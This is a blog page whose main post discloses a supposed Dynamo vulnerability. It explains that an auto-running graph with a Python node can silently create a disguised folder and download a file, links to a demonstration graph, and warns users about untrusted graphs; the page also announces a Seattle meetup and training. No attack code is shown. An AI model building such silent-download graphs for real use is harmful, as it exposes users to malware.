All posts by BIM Extension

Dynamo’s Security Vulnerability

Last week, I decided to see how far I could push Python nodes in Dynamo in terms of files external of Revit and I believe I have discovered a vulnerability in which an attacker can use a Python node within a Dynamo graph to gain access to your desktop. There have been some similar discussions on the Dynamo forums earlier this year, however the discussion revolved around the possibility of malicious custom packages. The difference (and frightening part) about this vulnerability is you do not need to download a custom package to your hard drive to be exposed to this hack.

Example

If you would like to see an example of how this works, download this graph and open it in Dynamo. It is a simple graph with a Python Node. You do not need to be knowledgeable in Python to understand this example.

Dynamal (31 downloads)

How it works

If you opened the Dynamo graph, you will notice that it was set to automatically run. This means the graph has already executed all it needs to add the malware to your hard drive. With around 30 lines of code, this graph created a folder on your C-drive disguised as a system folder, downloaded a file from the internet without your permission, and saved this file to your hard drive.

For the sake of this example, I’ve added a dialog window that pops up once the script has been run. An attacker would not have the courtesy to give you this notification as their intention is to save malware to your PC without you knowing.

What’s the harm in downloading a file without permission?

Most harmful files need to be executed in order for an attack to be successful and Windows will most likely prompt you before running any executable. However, are you paying attention when you run software updates?

A prime example of malware disguised as a software updater is the well-documented Placeholder Trojan. This simple script can give an attacker access to every keystroke you press as well as the ability to send screenshots of your PC to an attacker. This Trojan can be easily disguised as a Java updater as described in “Placeholder Trojan: Writing a Malware Software” by Garrett Bourg, Matt Bullock, and Robert Miller (A paper written under the guidance of Prof. Raj Jain).

Potential

Creating folders and downloading files is only one example of the vulnerability that Python exposes. Python essentially exposes your files and folders and has the ability to delete, upload, and execute files without your approval.

Conclusion

Let this serve as warning to all of my fellow Dynamo users out there. Be cautious of opening Dynamo graphs from sources that you do not trust. Malicious code can be hidden deep within complex graphs and custom packages.

Seattle Dynamo User Group

Rather than hosting a Dynamo training session in the greater Seattle area, we decided to organize and sponsor the Seattle Dynamo User Group Meetup! The meetup group was only formed on February 1, 2017 and we already have 17 members.

We will schedule the first meetup as soon as we have speaker and a venue in place. We are currently searching for both, so please let us know if you can help us find either of the two.

We are extremely excited to lead this community! Here’s to sharing, learning, and networking with other Dynamo users in Seattle.

Seattle Dynamo User Group

Seattle, WA
20 Members

Are you interested in using Dynamo to streamline workflows, build complex geometry, or harness BIM data? Join us to learn and share experiences about this exciting new visual …

Check out this Meetup Group →

 

Coming Soon: Dynamo training in Seattle, San Francisco



We are extremely excited to announce that we will be hosting our first Dynamo training session in January 2017. The class is intended for Revit users who would like to leverage Dynamo to eliminate repetitive tasks and build complex geometry in Revit.

The class will be held in either Seattle, Bellevue, or San Francisco – location is TBD. Subscribe to our mailing list above if you would like to be notified of any updates regarding the upcoming Dynamo training session in Seattle, Washington.